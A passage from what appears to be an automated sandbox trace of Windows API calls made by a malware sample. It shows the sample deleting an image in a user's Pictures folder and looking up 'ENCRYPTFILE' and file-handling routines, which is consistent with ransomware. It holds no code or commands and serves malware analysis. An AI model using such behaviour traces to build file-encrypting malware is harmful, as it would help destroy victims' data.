dwFlags=0x0, lpMem=0x43ca430 | out: hHeap=0x1780000) returned 1 [0088.617] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca358 | out: hHeap=0x1780000) returned 1 [0088.617] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2f8 | out: hHeap=0x1780000) returned 1 [0088.617] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc98 | out: hHeap=0x1780000) returned 1 [0088.617] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0088.617] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2490 [0088.617] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9c8 [0088.617] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca340 [0088.617] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24f0 [0088.617] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24f0 | out: hHeap=0x1780000) returned 1 [0088.617] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1d8 [0088.617] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24a0 [0088.617] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0088.617] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca358 [0088.617] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24a0 [0088.617] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0088.617] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca340 | out: hHeap=0x1780000) returned 1 [0088.617] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1d8 | out: hHeap=0x1780000) returned 1 [0088.617] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca358 | out: hHeap=0x1780000) returned 1 [0088.617] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9c8 | out: hHeap=0x1780000) returned 1 [0088.617] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0088.617] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8f00 | out: hHeap=0x1780000) returned 1 [0088.617] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x48f0048 | out: hHeap=0x1780000) returned 1 [0088.618] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2480 | out: hHeap=0x1780000) returned 1 [0088.618] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9dd0 | out: hHeap=0x1780000) returned 1 [0088.618] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfce8 | out: hHeap=0x1780000) returned 1 [0088.618] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2190 | out: hHeap=0x1780000) returned 1 [0088.618] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf450 | out: hHeap=0x1780000) returned 1 [0088.618] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9cc8 | out: hHeap=0x1780000) returned 1 [0088.618] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9bf0 | out: hHeap=0x1780000) returned 1 [0088.619] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2220 | out: hHeap=0x1780000) returned 1 [0088.619] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf428 | out: hHeap=0x1780000) returned 1 [0088.619] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d88 | out: hHeap=0x1780000) returned 1 [0088.619] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd10 | out: hHeap=0x1780000) returned 1 [0088.619] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2140 | out: hHeap=0x1780000) returned 1 [0088.619] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc48 | out: hHeap=0x1780000) returned 1 [0088.619] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d70 | out: hHeap=0x1780000) returned 1 [0088.619] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d40 | out: hHeap=0x1780000) returned 1 [0088.619] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2130 | out: hHeap=0x1780000) returned 1 [0088.619] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa90 | out: hHeap=0x1780000) returned 1 [0088.619] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9cf8 | out: hHeap=0x1780000) returned 1 [0088.619] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e30 | out: hHeap=0x1780000) returned 1 [0088.619] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391d58 | out: hHeap=0x1780000) returned 1 [0088.619] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2290 | out: hHeap=0x1780000) returned 1 [0088.619] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf798 | out: hHeap=0x1780000) returned 1 [0088.619] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e00 | out: hHeap=0x1780000) returned 1 [0088.619] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ba8 | out: hHeap=0x1780000) returned 1 [0088.619] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf658 | out: hHeap=0x1780000) returned 1 [0088.619] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2200 | out: hHeap=0x1780000) returned 1 [0088.619] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf630 | out: hHeap=0x1780000) returned 1 [0088.619] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ef0 | out: hHeap=0x1780000) returned 1 [0088.619] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca178 | out: hHeap=0x1780000) returned 1 [0088.619] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0088.619] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf860 | out: hHeap=0x1780000) returned 1 [0088.619] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9bd8 | out: hHeap=0x1780000) returned 1 [0088.619] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf7c0 | out: hHeap=0x1780000) returned 1 [0088.619] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2240 | out: hHeap=0x1780000) returned 1 [0088.619] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf4a0 | out: hHeap=0x1780000) returned 1 [0088.619] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca160 | out: hHeap=0x1780000) returned 1 [0088.619] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa68 | out: hHeap=0x1780000) returned 1 [0088.619] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2470 | out: hHeap=0x1780000) returned 1 [0088.619] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfab8 | out: hHeap=0x1780000) returned 1 [0088.619] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca118 | out: hHeap=0x1780000) returned 1 [0088.619] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb08 | out: hHeap=0x1780000) returned 1 [0088.620] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2450 | out: hHeap=0x1780000) returned 1 [0088.620] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd38 | out: hHeap=0x1780000) returned 1 [0088.620] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca0d0 | out: hHeap=0x1780000) returned 1 [0088.620] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e90 | out: hHeap=0x1780000) returned 1 [0088.620] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2150 | out: hHeap=0x1780000) returned 1 [0088.620] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfbf8 | out: hHeap=0x1780000) returned 1 [0088.620] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2e0 | out: hHeap=0x1780000) returned 1 [0088.620] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f08 | out: hHeap=0x1780000) returned 1 [0088.620] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0088.620] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc70 | out: hHeap=0x1780000) returned 1 [0088.620] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c80 | out: hHeap=0x1780000) returned 1 [0088.620] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2180 | out: hHeap=0x1780000) returned 1 [0088.620] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21a0 | out: hHeap=0x1780000) returned 1 [0088.620] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2270 | out: hHeap=0x1780000) returned 1 [0088.620] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2280 | out: hHeap=0x1780000) returned 1 [0088.620] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf608 | out: hHeap=0x1780000) returned 1 [0088.620] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e78 | out: hHeap=0x1780000) returned 1 [0088.620] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d58 | out: hHeap=0x1780000) returned 1 [0088.620] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x431d9b0 | out: hHeap=0x1780000) returned 1 [0088.620] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2230 | out: hHeap=0x1780000) returned 1 [0088.620] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9bc0 | out: hHeap=0x1780000) returned 1 [0088.620] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d10 | out: hHeap=0x1780000) returned 1 [0088.620] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c50 | out: hHeap=0x1780000) returned 1 [0088.620] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9b90 | out: hHeap=0x1780000) returned 1 [0088.620] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c68 | out: hHeap=0x1780000) returned 1 [0088.620] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf388 | out: hHeap=0x1780000) returned 1 [0088.620] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0088.620] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf608 [0088.620] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d40 [0088.620] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2220 [0088.620] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c68 [0088.620] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2220 | out: hHeap=0x1780000) returned 1 [0088.620] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cc8 [0088.620] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2200 [0088.621] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cf8 [0088.621] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2270 [0088.621] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bf0 [0088.621] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2220 [0088.621] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\h5_ZfAY-6STnb.gif", nBufferLength=0x7fff, lpBuffer=0x143f190, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures\\h5_ZfAY-6STnb.gif", lpFilePart=0x0) returned 0x2a [0088.621] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9cc8 | out: hHeap=0x1780000) returned 1 [0088.621] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x60) returned 0x43597f8 [0088.621] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\h5_ZfAY-6STnb.gif" (normalized: "c:\\users\\fd1hvy\\pictures\\h5_zfay-6stnb.gif")) returned 0x20 [0088.621] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e00 [0088.621] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2150 [0088.621] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d10 [0088.621] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2130 [0088.621] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e78 [0088.621] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2140 [0088.621] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9b90 [0088.621] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2280 [0088.621] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e78 | out: hHeap=0x1780000) returned 1 [0088.621] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391b28 [0088.621] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2180 [0088.621] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x60) returned 0x43595f0 [0088.621] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d10 | out: hHeap=0x1780000) returned 1 [0088.621] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391bd0 [0088.621] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9bf0 | out: hHeap=0x1780000) returned 1 [0088.621] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391c08 [0088.621] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43595f0 | out: hHeap=0x1780000) returned 1 [0088.622] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2180 | out: hHeap=0x1780000) returned 1 [0088.622] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9b90 | out: hHeap=0x1780000) returned 1 [0088.622] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2280 | out: hHeap=0x1780000) returned 1 [0088.622] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391b28 | out: hHeap=0x1780000) returned 1 [0088.622] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2140 | out: hHeap=0x1780000) returned 1 [0088.622] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391bd0 | out: hHeap=0x1780000) returned 1 [0088.622] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2130 | out: hHeap=0x1780000) returned 1 [0088.622] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e00 | out: hHeap=0x1780000) returned 1 [0088.622] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2150 | out: hHeap=0x1780000) returned 1 [0088.622] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\h5_ZfAY-6STnb.gif", lpFindFileData=0x144f1d8 | out: lpFindFileData=0x144f1d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4ed3ce30, ftCreationTime.dwHighDateTime=0x1d5ee91, ftLastAccessTime.dwLowDateTime=0xefa98900, ftLastAccessTime.dwHighDateTime=0x1d5e156, ftLastWriteTime.dwLowDateTime=0xefa98900, ftLastWriteTime.dwHighDateTime=0x1d5e156, nFileSizeHigh=0x0, nFileSizeLow=0x1880d, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="h5_ZfAY-6STnb.gif", cAlternateFileName="H5_ZFA~1.GIF")) returned 0x41ac740 [0088.622] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\h5_ZfAY-6STnb.gif" (normalized: "c:\\users\\fd1hvy\\pictures\\h5_zfay-6stnb.gif")) returned 1 [0088.661] FindNextFileW (in: hFindFile=0x41ac740, lpFindFileData=0x144f1d8 | out: lpFindFileData=0x144f1d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4ed3ce30, ftCreationTime.dwHighDateTime=0x1d5ee91, ftLastAccessTime.dwLowDateTime=0xefa98900, ftLastAccessTime.dwHighDateTime=0x1d5e156, ftLastWriteTime.dwLowDateTime=0xefa98900, ftLastWriteTime.dwHighDateTime=0x1d5e156, nFileSizeHigh=0x0, nFileSizeLow=0x1880d, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="h5_ZfAY-6STnb.gif", cAlternateFileName="H5_ZFA~1.GIF")) returned 0 [0088.662] FindClose (in: hFindFile=0x41ac740 | out: hFindFile=0x41ac740) returned 1 [0088.662] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391c08 | out: hHeap=0x1780000) returned 1 [0088.662] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2220 | out: hHeap=0x1780000) returned 1 [0088.662] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9cf8 | out: hHeap=0x1780000) returned 1 [0088.662] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2270 | out: hHeap=0x1780000) returned 1 [0088.662] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2180 [0088.662] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf5e0 [0088.662] CharUpperBuffW (in: lpsz="ENCRYPTFILE", cchLength=0xb | out: lpsz="ENCRYPTFILE") returned 0xb [0088.662] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf5e0 [0088.662] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2240 [0088.662] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf428 [0088.662] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9b60 [0088.662] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2220 [0088.662] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9b78 [0088.662] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2190 [0088.662] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797128 [0088.662] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9890 [0088.662] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2270 [0088.662] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8de0 [0088.662] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e21a0 [0088.662] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9950 [0088.662] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xa0) returned 0x40a7a58 [0088.663] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9890 [0088.663] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf450 [0088.663] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9908 [0088.663] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e22f0 [0088.663] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9950 [0088.663] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bf0 [0088.663] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90f8 [0088.663] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0088.663] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2130 [0088.663] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2280 [0088.663] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e48 [0088.663] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2180 [0088.663] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf388 [0088.663] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d58 [0088.663] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2280 [0088.663] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c80 [0088.663] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\i5q_5Bq6.bmp", lpFindFileData=0x144f078 | out: lpFindFileData=0x144f078*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x789db490, ftCreationTime.dwHighDateTime=0x1d5e3fd, ftLastAccessTime.dwLowDateTime=0x350e5ad0, ftLastAccessTime.dwHighDateTime=0x1d5e336, ftLastWriteTime.dwLowDateTime=0x350e5ad0, ftLastWriteTime.dwHighDateTime=0x1d5e336, nFileSizeHigh=0x0, nFileSizeLow=0x1297e, dwReserved0=0x10189fc, dwReserved1=0x8, cFileName="i5q_5Bq6.bmp", cAlternateFileName="")) returned 0x41ac100 [0088.663] FindClose (in: hFindFile=0x41ac100 | out: hFindFile=0x41ac100) returned 1 [0088.663] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2280 [0088.663] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e48 [0088.663] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2130 [0088.663] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391bd0 [0088.663] CharUpperBuffW (in: lpsz="_WINAPI_FILEINUSE", cchLength=0x11 | out: lpsz="_WINAPI_FILEINUSE") returned 0x11 [0088.664] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf388 [0088.664] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2130 [0088.664] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf4a0 [0088.664] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d28 [0088.664] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e21f0 [0088.664] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9dd0 [0088.664] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9e78 [0088.664] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf608 [0088.664] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d88 [0088.664] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e21f0 [0088.664] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf630 [0088.664] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cc8 [0088.664] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d40 [0088.664] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9338 [0088.664] PeekMessageW (in: lpMsg=0x144f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f114) returned 0 [0088.664] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf4c8 [0088.664] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c80 [0088.664] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2300 [0088.664] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c50 [0088.664] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d58 [0088.664] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2140 [0088.664] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2290 [0088.664] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391f88 [0088.664] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILEEX", cchLength=0x14 | out: lpsz="_WINAPI_CREATEFILEEX") returned 0x14 [0088.664] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf770 [0088.664] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2220 [0088.664] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf658 [0088.664] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e00 [0088.664] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2290 [0088.665] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cf8 [0088.665] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2190 [0088.665] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d10 [0088.665] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2150 [0088.665] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2230 [0088.665] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e18 [0088.665] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2290 [0088.665] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9e30 [0088.665] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf798 [0088.665] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d88 [0088.665] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2200 [0088.665] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf7c0 [0088.665] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c68 [0088.665] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0088.665] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0088.665] WideCharToMultiByte 